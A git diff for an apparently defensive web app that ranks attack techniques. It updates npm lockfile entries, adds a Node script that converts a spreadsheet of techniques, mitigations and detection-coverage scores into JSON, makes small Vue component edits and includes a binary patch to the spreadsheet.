"https://registry.npmjs.org/tar-stream/-/tar-stream-2.2.0.tgz", + "integrity": "sha512-ujeqbceABgwMZxEJnk2HDY2DlnUZ+9oEcb1KzTVfYHio0UE6dG71n60d8D2I4qNvleWrrXpmjpt7vZeF1LnMZQ==", + "dependencies": { + "bl": "^4.0.3", + "end-of-stream": "^1.4.1", + "fs-constants": "^1.0.0", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1" + }, + "engines": { + "node": ">=6" + } + }, "node_modules/text-table": { "version": "0.2.0", "resolved": "https://registry.npmjs.org/text-table/-/text-table-0.2.0.tgz", "integrity": "sha512-N+8UisAXDGk8PFXP4HAzVR9nbfmVJ3zYLAWiTIoqC5v5isinhr+r5uaO8+7r3BMfuNIufIsA7RdpVgacC2cSpw==", "dev": true }, + "node_modules/tmp": { + "version": "0.2.3", + "resolved": "https://registry.npmjs.org/tmp/-/tmp-0.2.3.tgz", + "integrity": "sha512-nZD7m9iCPC5g0pYmcaxogYKggSfLsdxl8of3Q/oIbqCqLLIO9IAF0GWjX1z9NZRHPiXv8Wex4yDCaZsgEw0Y8w==", + "engines": { + "node": ">=14.14" + } + }, "node_modules/to-regex-range": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", @@ -3405,6 +3737,14 @@ "node": ">=8.0" } }, + "node_modules/traverse": { + "version": "0.3.9", + "resolved": "https://registry.npmjs.org/traverse/-/traverse-0.3.9.tgz", + "integrity": "sha512-iawgk0hLP3SxGKDfnDJf8wTz4p2qImnyihM5Hh/sGvQ3K37dPi/w8sRhdNIxYA1TwFwc5mDhIJq+O0RsvXBKdQ==", + "engines": { + "node": "*" + } + }, "node_modules/ts-api-utils": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/ts-api-utils/-/ts-api-utils-1.3.0.tgz", @@ -3475,6 +3815,50 @@ "node": ">=4.2.0" } }, + "node_modules/unzipper": { + "version": "0.10.14", + "resolved": "https://registry.npmjs.org/unzipper/-/unzipper-0.10.14.tgz", + "integrity": "sha512-ti4wZj+0bQTiX2KmKWuwj7lhV+2n//uXEotUmGuQqrbVZSEGFMbI68+c6JCQ8aAmUWYvtHEz2A8K6wXvueR/6g==", + "dependencies": { + "big-integer": "^1.6.17", + "binary": "~0.3.0", + "bluebird": "~3.4.1", + "buffer-indexof-polyfill": "~1.0.0", + "duplexer2": "~0.1.4", + "fstream": "^1.0.12", + "graceful-fs": "^4.2.2", + "listenercount": "~1.0.1", + "readable-stream": "~2.3.6", + "setimmediate": "~1.0.4" + } + }, + "node_modules/unzipper/node_modules/readable-stream": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", + "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/unzipper/node_modules/safe-buffer": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", + "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" + }, + "node_modules/unzipper/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, "node_modules/update-browserslist-db": { "version": "1.0.10", "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.10.tgz", @@ -3513,8 +3897,15 @@ "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", - "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==", - "dev": true + "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" + }, + "node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } }, "node_modules/vite": { "version": "4.5.3", @@ -3666,8 +4057,7 @@ "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" }, "node_modules/xml-name-validator": { "version": "4.0.0", @@ -3678,6 +4068,11 @@ "node": ">=12" } }, + "node_modules/xmlchars": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/xmlchars/-/xmlchars-2.2.0.tgz", + "integrity": "sha512-JZnDKK8B0RCDw84FNdDAIpZK+JuJw+s7Lz8nksI7SIuU3UXJJslUthsi+uWBUYOwPFwW7W7PRLRfUKpxjtjFCw==" + }, "node_modules/xtend": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz", @@ -3713,6 +4108,39 @@ "funding": { "url": "https://github.com/sponsors/sindresorhus" } + }, + "node_modules/zip-stream": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/zip-stream/-/zip-stream-4.1.1.tgz", + "integrity": "sha512-9qv4rlDiopXg4E69k+vMHjNN63YFMe9sZMrdlvKnCjlCRWeCBswPPMPUfx+ipsAWq1LXHe70RcbaHdJJpS6hyQ==", + "dependencies": { + "archiver-utils": "^3.0.4", + "compress-commons": "^4.1.2", + "readable-stream": "^3.6.0" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/zip-stream/node_modules/archiver-utils": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/archiver-utils/-/archiver-utils-3.0.4.tgz", + "integrity": "sha512-KVgf4XQVrTjhyWmx6cte4RxonPLR9onExufI1jhvw/MQ4BB6IsZD5gT8Lq+u/+pRkWna/6JoHpiQioaqFP5Rzw==", + "dependencies": { + "glob": "^7.2.3", + "graceful-fs": "^4.2.0", + "lazystream": "^1.0.0", + "lodash.defaults": "^4.2.0", + "lodash.difference": "^4.5.0", + "lodash.flatten": "^4.4.0", + "lodash.isplainobject": "^4.0.6", + "lodash.union": "^4.6.0", + "normalize-path": "^3.0.0", + "readable-stream": "^3.6.0" + }, + "engines": { + "node": ">= 10" + } } } } diff --git a/package.json b/package.json index 2a32b7e..63d8fda 100644 --- a/package.json +++ b/package.json @@ -7,9 +7,11 @@ "preview": "vite preview", "build-only": "vite build", "type-check": "vue-tsc --noEmit -p tsconfig.app.json --composite false", - "lint": "eslint . --ext .vue,.js,.jsx,.cjs,.mjs,.ts,.tsx,.cts,.mts --fix --ignore-path .gitignore" + "lint": "eslint . --ext .vue,.js,.jsx,.cjs,.mjs,.ts,.tsx,.cts,.mts --fix --ignore-path .gitignore", + "update": "node ./scripts/update_techniques.js" }, "dependencies": { + "exceljs": "^4.4.0", "downloadjs": "^1.4.7", "marked": "^12.0.1", "pinia": "^2.0.29", diff --git a/scripts/.eslintrc.cjs b/scripts/.eslintrc.cjs new file mode 100644 index 0000000..1a4431d --- /dev/null +++ b/scripts/.eslintrc.cjs @@ -0,0 +1,5 @@ +module.exports = { + env: { + node: true, + }, +}; diff --git a/scripts/update_techniques.js b/scripts/update_techniques.js new file mode 100644 index 0000000..537dd27 --- /dev/null +++ b/scripts/update_techniques.js @@ -0,0 +1,137 @@ +const ExcelJS = require("exceljs"); +const fs = require("fs"); +const SOURCE_FILE = "src/data/Calculator.xlsx"; +const DESTINATION_FILE = "src/data/Techniques.json"; + +(async function () { + const wb = new ExcelJS.Workbook(); + // initialize new list for techniques + const techniques = []; + const subtechniques = []; + // read from techniques tab first to get the technique metadata (ID, name, etc.) + await wb.xlsx.readFile(SOURCE_FILE); + console.log("Reading from Calculator spreadsheet..."); + const techniqueList = wb.getWorksheet("techniques"); + techniqueList.eachRow((r) => { + if (r.number > 1) { + const t = { + tid: r.getCell(1).value, + name: r.getCell(2).value, + description: r.getCell(3).value, + url: r.getCell(4).hyperlink, + tactics: r.getCell(8).value.toString().split(", "), + detection: r.getCell(9).value, + platforms: r.getCell(10).value.toString().split(", "), + data_sources: r.getCell(11).value + ? r.getCell(11).value.toString().split(", ") + : [], + is_subtechnique: Boolean(r.getCell(12).value), + supertechnique: r.getCell(13).value, + subtechniques: [], + mitigations: [], + }; + if (t.is_subtechnique) { + subtechniques.push(t); + } else { + techniques.push(t); + } + } + }); + + console.log("Parsed technique metadata from Techniques tab "); + + // // read from mitigations tab to get a list of all mitigations + const mitigations = []; + const mitigationSheet = wb.getWorksheet("mitigations"); + console.log("Parsing mitigation objects... "); + mitigationSheet.eachRow((r) => { + if (r.number > 1) { + const m = { + mid: r.getCell(1).value, + name: r.getCell(2).value, + description: r.getCell(3).value, + url: r.getCell(4).hyperlink, + }; + mitigations.push(m); + } + }); + console.log("Parsing relationships... "); + // read from relationships tab to assign mitigations to techniques + const relationshipSheet = wb.getWorksheet("relationships"); + relationshipSheet.eachRow((r) => { + if ( + r.number > 1 && + r.getCell(1).value && + r.getCell(1).value.charAt(0) === "M" + ) { + const mitigation = mitigations.find((m) => m.mid === r.getCell(1).value); + if (r.getCell(5).value.includes(".")) { + const subtechnique = subtechniques.find( + (t) => t.tid === r.getCell(5).value + ); + + subtechnique.mitigations.push(mitigation); + } else { + const technique = techniques.find((t) => t.tid === r.getCell(5).value); + technique.mitigations.push(mitigation); + } + } + }); + console.log("Parsed relationships"); + // add subtechniques to techniques + console.log("Parsing subtechniques..."); + for (const subtechnique of subtechniques) { + const technique = techniques.find( + (t) => t.tid === subtechnique.supertechnique + ); + const s = { + tid: subtechnique.tid, + name: subtechnique.name, + url: subtechnique.url, + description: subtechnique.description, + detection: subtechnique.detection, + mitigations: subtechnique.mitigations, + }; + technique.subtechniques.push(s); + } + console.log("Parsed subtechniques"); + // read from the methodology tab to add scores to the technique objects + const scoreList = wb.getWorksheet("Methodology"); + scoreList.eachRow((r) => { + const id = r.getCell(3).value; + if (id) { + const technique = techniques.find((t) => t.tid == id); + if (technique && technique.tid) { + technique.cumulative_score = r.getCell("B").value.result; + technique.adjusted_score = technique.cumulative_score; + technique.has_car = !!r.getCell("N").value; + technique.has_sigma = !!r.getCell("O").value; + technique.has_es_siem = !!r.getCell("P").value; + technique.has_splunk = !!r.getCell("Q").value; + + technique.cis_controls = r.getCell("R").value + ? r.getCell("R").value.toString().split(", ") + : []; + technique.nist_controls = r.getCell("T").value + ? r.getCell("T").value.toString().split(",") + : []; + + technique.process_coverage = !!parseInt(r.getCell(31).value.result); + technique.network_coverage = !!parseInt(r.getCell(33).value.result); + technique.file_coverage = !!parseInt(r.getCell(35).value.result); + technique.cloud_coverage = !!parseInt(r.getCell(37).value.result); + technique.hardware_coverage = !!parseInt(r.getCell(39).value.result); + } + } + }); + console.log("Parsed scores from Methodology page"); + // export technique list to JSON + const str = JSON.stringify(techniques, null, 4); + fs.writeFile(DESTINATION_FILE, str, (error) => { + if (error) { + console.error(error); + throw error; + } + }); + console.log("Export technique data to Techniques.json"); +})(); diff --git a/src/components/CalculatorFilters.vue b/src/components/CalculatorFilters.vue index 924273b..8465971 100644 --- a/src/components/CalculatorFilters.vue +++ b/src/components/CalculatorFilters.vue @@ -29,6 +29,7 @@ export default defineComponent({ }, computed: { filters() { + this.calculatorStore.setFilters() return this.calculatorStore.activeFilters }, }, diff --git a/src/components/TopTenDetails.vue b/src/components/TopTenDetails.vue index 05b4ec9..b8a2ba5 100644 --- a/src/components/TopTenDetails.vue +++ b/src/components/TopTenDetails.vue @@ -25,6 +25,12 @@ +
+

Detections

+

+ {{ subtechnique.detection }} +

+
diff --git a/src/data/Calculator.xlsx b/src/data/Calculator.xlsx index 5d013edabd4e62b845c1271f6eb6261e776ee2aa..076674d70925a849f9a161f14616a3c962b7736f 100644 GIT binary patch literal 1654661 zcmeEt^;4Wtuq6(IOYq?C?k*V!PH=Y}G`QPf2?Td{9o!+f1b4UK2| z?zgUOm(!%PEF=#O8Wm@JzUveW?)ZYM_KA%{m$v=~L97M@Hfd`zq7I%$ zW3=L)z^R;gG%n;oArd23JB-l2cOVRY;_W^qR(yJsW%qWf%X~P+(#f!9ohh(eWg=X3 za;?&3Ki#IVBY%5cnMg?iJgHL$=z)LSG4GZpV-QZ0T^L*S+DDYXduXG#nX#;_~OFKTf4+IsJK*q9p?Cve{GU4FW@ z{UR>THF+nVwD+0vJq2?Ar5)w_Jmh{?KJ0HC@H=gFurE1vM3ushY0bfzYq8wTNIUvp4G!ELJCAPrb&?lAN8oAaLE) zxvz4U-eZW=^cbhzB|USu)j_W9&7uD%WCZnga| z<8CWBSQwaXC|;mJ0mbCAm4h1x`@i-71Ihnn`1r5AS0^ef!gFCqoQJ+qO?($wXQrNW z;P~)M+42RJE91pfAS1rGKcN z_|n#fjFa>k7<(e$A42U=`KRiJCzko3VC6>qOZ9Fcn4Rt|n8-s;dni<_-Ox@@H{~;t z{4<~|%O|82=gH*qRtLrZ2B00Tn;g97XA!113|5es;y@43b1`q`Fge@2mFrYe3J%lsp7 zt!Z*wN3bGCvhb18pX&tm{F@DM%cv$u7T-UFza$Y5JrIRJ*{-0N!LYyg^57%|7p7EN z{RtPh0a<3LYCY?KMHBs0v6K;nx57L}TP#^k!N}JI)2CE!AAd`$q0iY=Fl9G+pL!rE zr_NjS*o35)vxv@bCw)!d{IY%5eEJ;Zm|{g2$uQ&vM{8^=)swQ72?yh-Uh38hZeo(j zO8Q`ngXc@EB-$McOg3aG;zn=By@nZti#p={HYJg?lDB4G;t`VuXk7&2?tcF~mC)IKF8BL~Dn z?HLd6DzF5c1mQ^qJze)wGRdVUv!#auo$==5y9-)qhTMVtLm$_|t%d7UG#L1dXRj~o z=K1T%mS0PY`U0#*{GMus2HAz_;XypEA?>39*dI22eFW`aJ&Ouwfa_JB$%yGR?1Mu&0+j zIQGr4EbhHws*(qYpbew3nvSLU8o7qf3)9HHYZvE4H{jr8TZ~0aqp%2LBjBZiRm==c zHn#vLy+;c+v1zIl0e$!!(++o4Ryv2Pt!Zkm;>K*OUsU;t_Uxg-^8K`%i(f3O)#Q%N zfCRTGkvl`*QfCorri*rCxFF*EBht0VTS5WNH9f+gJ1)Vg#0s~+N>-R&(K-_1Sa`QMQmFdLj<+9=?nfb^AdqGMyu(4@^OLv*fumBk1Oxr0ag$hX|8ZWvk$QBti}zlV!`TTIRyg9vhQvVUpKz-*B)7a1GO?&`E&v5c zt=SFln(qnxU(zWnF;Alqws#!gf(Aa^biOrvvAVaAsXbk+ggsdjisi4X*twT$s!63~ zfy%uw4Rb~C%O;J}xNW(cXe&Qd67zI;$p;znddD!1$ zN|_P_T7@@}@8_evLN}7`2OH#Ue5VCxj!yeb*+NnoC>-s+C2-k>BsRB|4_%|@&Nwo1 zzRQRZ;2tiu2Fob&pDeNHbr*-Z&GHDV*RWZDyBBs373 zJ>O%Kv78u9!JT{ioF5K9v0%QPe4BaW%FhCi*Oydm&00PRK!N4|?L;}3->Im-!oXad zBf=2<7xcKi9KNSz1QfH}rVSS9PIiy35bkxc<*ZSskablLOqUOTqg?Am>2oYcP1GZ4;S`k#& zxVgtA+-WFWhU5MrALd*hxRDb{x?u3KKk{ZeC_2~->&E^B(&n*e7^A5Zt^d|8zoUM? zGuTVujt~|s`~qdlXdeU*NxM zFt3)wG#3b<;E^B~73TkIsOoYavH70U?iudT-+(iHwL)m=x}oZ5P&Po>(+!(P#l)7w z{VisCR!xIMweLDeS??#(^*;`Ld;5VbaVbjvOb(utkLJ579 zaILYalhefQ{MPF2%EsopNfdQ5_=zL2`cXUe06jjK1xAn>uIKfV;_ZG!A};9ZXgl!f zrss9}?O{IX<%wgGBj|B2=5kRdiCq=UC>kB+xdN* z#OrI^Ta1MGOZ&?~tI1oS-(k-t`4?pVo@b`ly}0|Uo(n);Zgn)! z5$E;bR{A7f`dB14-KVH?i*FOr?Oll!S^94gLx0%*x8$f(>|LeZ*NX;nUGCMHOz;N^ z<-M9aVGVIuiCOqRH^RKfCGtuk7>UQrpDX1TH zZl(TlY=iRIPaZ%$(2T6K-t_mMCA{Jklby?NxS>tl*bGgJj8X&zQ!$@HITZl?+vNy- zuiWP_EisfSbo3~^sW_Gx2&+TF$Md6mxAEAPEEHYHO4zc7n`W{AseLcEuA*eh-B=ad zag+uW59?%Hu(|^FE07N5HVp^Cfmn)JQ3>0Yl}6sBPn)o+Y%}jj@Ux$a5Vgd!m|5{1 zCXMx2{NnA$;a6`tCK*e5;SfmrqI*b4x%T^?8R}!$vL180Xhnm~M)|F#A+Rkia|X*} ziR_#aWQ(NyO9AMneB*=0zsvs9qD2dIckW|}I9g8$DqWM%&852UI;uD*K3)*3597-6 zb)X**q|n98DU;r%Ij!}kI=R-S(B0DT2LE++ewLRh3j80Vl_aTL&#~6*1`h5UUvuG>AK$G0{Ye!Ds>v6K2DX46#v|&&* zbhu@VhP*e9!g;8ONODiTGdHWzNtG#XfdZD^yI72pfOEdz6IKdmiis1fBd32rDECgURaKBV-PWIaF;Nz!+ zvMgG0L=uBm>9_2%OagEEfJ{P4c>|^ z3HzN!sUmC_W?{g8Z zhk3`N0c8CYdt~ziNplLg+~_CWJP9N`MWnZ=uDZo39h|cgF=+JRwp$P-_}bmEt3a|? z@gKj~|4?D|7QnNCx<@-0ij<>!ubqV@pspHT{81pQ{VEDcb`n^!FIEt$%gr1KR~21i zLpXv%KX^PelD(3NhnBKyoIR2OX&;dWoz=IgKa?1?ZEFhomUvxR={mAf5uhJ|b@?ph zi;a7U)PzX!5AQHgYkjv|89B{j#*}E3h>L{r4BUqE-8ZV{2A8tAY$u5aV#ic}C0=LU zAL{rDm`=b=W|Alo%T#*I58EGI9q|9ijm-s~kjk!Zgjd#7{v4T2$F>HsN2FM4(T`Ux zvhvMFn;kFr&~m2K;-w!WE;v%ECN_7cP|P&*52Mlvv@Hf0!adzvEq6!lpXvUb;6mG< zD_xXXH1Pl8c&DF&iCRg%53xt4QOYRUg*D)r6tUAhfRC_4nM^~VuMYZX+OlEIwsz~9 z?;ojJUZhoXLqyrQWtY8XeRnxf&cvhD;|z=68dZYm7c}!BYe_m4r9}K?CZD&fF`V~! zTf{)V(bjP)inKYLcK|$PlBgQL;BCX%QHP@;G68x~7G(VgSW}a5)p0xNx zoAGlLI5{9!T|33rtUx{VR|(Gw)=kc$a6!u#;m=_bh~nO{mend+7SAwf8%RbwB>0h; zm&?CV-j3K(%3xs&SnC&nNUrCZt;c+Bp# zym1BUT4e1GX1YS(M$t(OwmlJux}@D%7Sh0g8)sZFou{)oI@O#DP%F(7xqeTs!O=M9 zEdi{!&{pdwy5jcwpiXRI9Kok+6!p2tH`EQN+c+O?3pY<3N!r||cFZprMh%K3FEIvL zxCE7;cFK?+{MgY{RpjW&!;Mcro5q=)**PwbeKx4X;F91&3w}Oy`~PI z+9BP;Cp2sm0@`fdq=S`aa)hlPbCS)cvaaQ2*%g>iKPRd`Zzp0_9gX?{N9D*+6$Fdc zMo=`S%5OuKf_aLgS~~D08u>I9iL6<)Uq5ZGnv}2GroiRRRP$k%@!z(;r88Gc)IC$4 zxcr{$#6 zqyLU}R@{ehZeKL;ZQdA_um1>$ckf78z0fCBC07b z8KUxNSX7(ZvsEH0Qhd~~Yuu$!65J^7TF-zygyKUUTGC1JM?4FhKnAhS{v}=@{uW>b zkl74fp}8t<+hLLjSC?kdi+vqOw%3~GYVWm0bm=PN-ZNzpwfdHuB{q@-nh!<`c`KPU z?RiPSSRU3dYyAX>21n@qyniqHUrG}qYp((9^-IHvK7dFbjZaR(IjHqUgc|EdfQEd0 zeiG>hXB?|5+_9t%p!m1pWG?2xRQ{tbbUu4zbDNe!;|K|mzTn_lXg%;3*UC_{-Jp+TZ$1U4fM`Ng>oO(}gh~jJ&ggpjxNcS{`SLLr@KUiOQ zC~qe71qgNUrYjPX0UTL!zx$iWTiNMwY@}xRLx29ytchbx4h~jXl&15&K4dE01Wy+i zGLs;`;dEp@u*0SG%o>uURzUW{{87zRS~BGsn2xJPC((q2Ap2eW`&9-+2zE9TFP?Of zSL{RpOQg&T)Y5+lf?_PC-Rl~miH{(|PINPfhOIqIY_uESz8-}TV{{d-($P9MZW&gFGv%G7p80xZje~IiNc+1&Z<&$ zg{j60RI-m#Bg*XvycJR}Rv{)bW*}Gq0!+gY8Ur!k?5s zjO+Ne0{0?on(M*byxC_l@~F!HDcT?KRW-koo%beWtssvYKv z(RVtMJ7%uinIaYJ>Pl&RL#wt<#eYv~*3YW!CSJg2O29lNKIv-MFa~%AOtCt+Y;6DGtcs5TNfD+_e}fWMjaqyQGYH6SpPg{F!mh+Ut1 z!bV7QKv~5Ulmsx%?^pa=va7+$9e5fek8!@_hRjF? zC}%!6B`&eKMWmZ(n0$|j+jo51WJY zCLjwyqb;up#zer#-7)=Etu;Z#;bfOuctK-jrWg2lp_vS|x={O$Rt$=f&GW~+=|{=B z^QPS3cBC=RGJ-FE2rv`7ve@!d5$Ufwqw7IpD5Jb17)xAE&Z914yN5YuNdvQ)!2%CA zBVh$1pB%NiS7|CWu)G=TGJ`u5#Gx(6Pg*6n^b8dTWsQ?O93%uQ}|B4#je zu;$6dIiylU=gCXqtz-!}5y(dm zr~sZBLeI{MQPcP+wbfG4O6V_N2q0w}T4A@}`|HkEl|pv7_9{xNsVf^12H~ohif{s; zkS@9y)s3eQYD(1B(f>?UPk(-!-3vyy0f#sn5Kv6T>erFq zlHT*%YX&7Ouj%%)V#=psz+#mx$@;58kzA&ks!h45g*+?vnKbv)tMZ)LS#(2G1Gp`; z@^=~4KNqj(V=D3V-74VCAasLtOPZd_)vNX~2ro{bh>qDi&0Aq#7#B8htw0vc9t)b3 z7=gK{?__FDD56&(p9>morWXmkuQez& zq@Pn!SW>r&^aq+JsY^(c2TO?>=~FgZal~{PUbVbLjx1iB20|fkX8sD4KX+tx+xUvQqPc8>iAdZz}ibaKu z<=!ZNhMBgVya7eD3+w_NQ>4G6@!;vr|B0-Dw#LZ?NIYX3Q;tD}ha(s1iBfwDcTvaH znARbSVGbUgP;Z8hO&j=Pse)8U@U3%jpsZpB%qUjB;a+i8A#SpMaB1c$MdwfdgoJ;z zYFo_rF*y}0vRtLe4(lJJTCCxeCaZG{EM;>uDy?TCL)z2K(lwAsPx*ckJYg`(EU{A6 z@TaOpMDUcLNB3M+?ep1v`S<;)P$x7c#v+4K9Qx$?e1n$5WGOQ3J(Fo$48|~$dW{Iu zMQ*MQ=N6@5udHM(@)l-j21*l?sBB($U4rZ;7XAL-j+*6ECQl9MFM)g!t9(f60`j)9#}DJ339vtcK$Z+AP0kk7xMAq)i(Jp z2tE#8*}Max!YnmUkgMm=e}u-#IyK?~8YfQ0%@L;hQjk-G-R>f>Sug9SAW|wH!@mqfjRdj*7Gb{~qINbK@g0_masQ0jPBV%vGBcXR3?D+-0lF6QEypAR`Rt-0 zb_H1+(R{Al8~`ORyA{W}Kx$ZnG?L}Dm9od3(}uFV)u4pbYM+9qzBUS3JE11HsvmW8 zKbH1Tsz&SPbQd(tCpVCRrt6bTwip}83iBjH*HFkj?J4)_3s5VnbTj!QB~MTPerjLS zUpevW`2)g$g#wb1_9;$t1LrCn-q_0PSL!+)0{Sdnp0W7n&bgvs9)0++{PdG#v-Ah7 z2NRnwB#>u+UK($ZR`^mumBQ6lETZ|{IuYhpjjM4&P*Yf?oBL4 zEn3fqAsGbJ-7`k|U_Rap1m$Q%RD1X~c=QFrb3lWy+VU^>P5a5*0{H3{1xHD@%e3P9 zxvYiSB>Vo1P;_kjvxlNF_QU)zSr;$wCZc*>N$c|&h8FDac zUUX(vS)jluGf)AVf|3ILP=XVhkIQYI0F;J{~kSA5f{d7+YYbNpg>nQt#=U_;TR;1_s#SPLyNqvR93z%B!d^pIEpe# z#B_dXGE$3ObJ#~v?~E&;3eg2mFal?tc4UdwJJ&4rD&4;#cgUjkp_{p$e$x*E*)e<8 zad72p?<^}tXP$3NS>va*I!5oYNoJ4v*Ea(QX_SPZt1X7049TU!9?!JHq|m?;?_gYy zCVUl?l8raws(oN*|0VgmQij<%J}Y^}+&k`kX8r#Cz%WKOAq_P?ixct(9Qv60ulutk zoJh?ky{#y1s+JTFFCkd)PpG-E5CfL}v#;?xAR>l!cQz_xOal>G40$<~`Y7~^@zBvZXbC9-CXRb276`pxfm2v!0F;^_8_m#kK-%lS={*+7cue;N=_?-`B15b-pj4=; zfA}j`{V-ad&&cj!4cd^~S&fq=CqN!Oe3~-@R9Kp<3&w3R=s5xfvbxk9TdI1>)ziC} zEdY@6zC~K*uF?rjr&rjqU~#*Qq9=^8QWCHqW1a791NIRPefBJB4?~l+POb#aM58G# z2&!AZp=V3Q8h|d0p-q(mB2>>TQqrz_kW76%^H$EN*m#Cdh7D){9UL`mo61%rg;1a> zFLyAzzuq`C0$B zf^VgQL^_{ed_632<2;Mw9oSxn;GKynUn47HAT&u?8Ob3bJk%jX>EWC<1bxAJ2nKdB zvxrX^=}?#S7S-scq9QcV^q`n$HE~>4>29{RVikKCW z5TH*K82nJPgfo z%Tkj5XePdT8+5odJ={09>)Ny92jMl@y|b!2zc!CfUR3>XGZN~^A7ko0Az!&j4Zzo7 z{T(ZWsNJY}QwSZ2r5-07Lnl|pxH2UHuOHI=J}&&?>-k0JBOrD*6xi75Vmz9u#n1t@ z&hgQP_SmgE$f@EsfVNAHcRf#r_o=B%Ms=>!NI|ijGIbc|T{`wSf#)56if&7t46&ib zkKB6oI90Rsp|T4G!TO6$-fzdyzO?W2g6#r*jSNmLRCeg{W-C-Xi)QOToIM?3EIrGF z2l99RrQZQT?o>Y1L#0QGwcbB|${W^)#;Q&=i3{5C&KKn-0f(NT)Lrq}VRAJx636$c zAMt5&@2p(iltTVmKkQxP{A#3hcLZ}_ZR~Fclg7BgS0}=r@aX`GiUDSiQ@?jl9&+B$ z!B*bzKn$l<9yxYB-(5g)XDy^dK>upxv(v)rNbIqe@{04%r(Tje=a3au49_X?_bPV* zdHlMKaZ?zFZohqn1!nr+L1%ZMSR#pcxM{dBlSzVfOT65?A$Hd9`g`wo zLV_FPOhHxE;1?uC;X0%f0~e>@fr=A9#R!eA!Bzx%<6S?Dd3-75xvYCbxIK!jz15TN zxx66dqAk2iqd%^{K6{?vR6Z1y z;#cDJNAn39t;7Q=jIyM6YFycWJ6|K5d;a=#HQX|NbY^Z!aDPqww!^jgzUo)2O>zVl zezJ>ZD<>4KD-DR64pA}tl@P=l`Q}TLRI!gP`#Gy;+|88<5SQ0T6a`my^=*FL zA*33*wUkgkJ$&@_o+vMAw*=cSlfb(`#fgFb;!mi=Ht;?3Q>Y&86r(|J3m>5=?Q|*X z_!{_eOLHNEC4=ijS33i?ElRS!i1&NBJ=!e;oO_4ZXh2Fd>p+-80 zVeRh?JZ2Qe#+`rGD(9fMlwZl~FbRk{Fv$)c|0dq14wYjD2GX#%q}bTiu&{&+*?l{j zaNSofr4yOCfxPv4JtbrlI@p_ux-}&0xoW5S0?N?AZ3Z8ppV)c;TAkK*zWvb;scrluDmDb)wZ-jJruk4C2^>g&8OmU>-WuTc zFK32*h9-F`5#yF-O=BQe3nhM!bH(Z`b*t1p6umX8E9ZpaaO++GuDbw;FPe`ZN zHsyO!4K%u+UlRhZ%&b_=2zYI;b_Cw5sB!%|)qp!IN1w($;umEU9#+7ThqBgkB_BCz zwWkw_unRQzq$XvB>iLQ&`$;xyp|=JhDjVhMoDZKMVo@)LQ?b>M>&#>5$dpMQLm2V0 znRVhSM^5Z2L_}C2eY%~PoCnSxg`prc*w^Gk2msbY6)Hc2I~YtsDw4u9wvGo8Oa7h* zz?|TPU;1dbP_+g9wr@ z6mIHqO1tLTp<}yC27yWeyX@6WvLO1Urb<<~`OjAijs>iC+=O}tzkS}IBlWVpm7l(e zS)ZaGJM-{vpd3SJclHX+xizO|XyNjFe<t((QmJ-eP`t2Eb3A4g2v=vj6^f@sK?0 z9|4u@+1%w(omqPH16K^Tnp4o3%%L?j7Gt5+5MJ(GeJp8d;`b^(5CQV3kErsKtcg2E zXu!=~cgNQ`t)YM3)l~gUVWA?wtT9$MAY-;jBer!3`sJpn8The-2hGfv)3Yz|3SH7y zfMwk0KL=t9jS;n@E`hAP_SOmL6yv+Zt2-_3pRMh#F$+TV4ja|7TmCQuLH(?qHHEzT zm+$-u`0Yap46ei|^xdp4(=w;2zmwkjn>v;hFfIFH<66(UsHAIYM0|$JT>WGz60Z;G z-Op9ew9!#(=J-_qD%cO5Qic@r=_(ar?#(r`TYHXv#L@0rtB$?(E7VHO4X{A3!i@&vHx 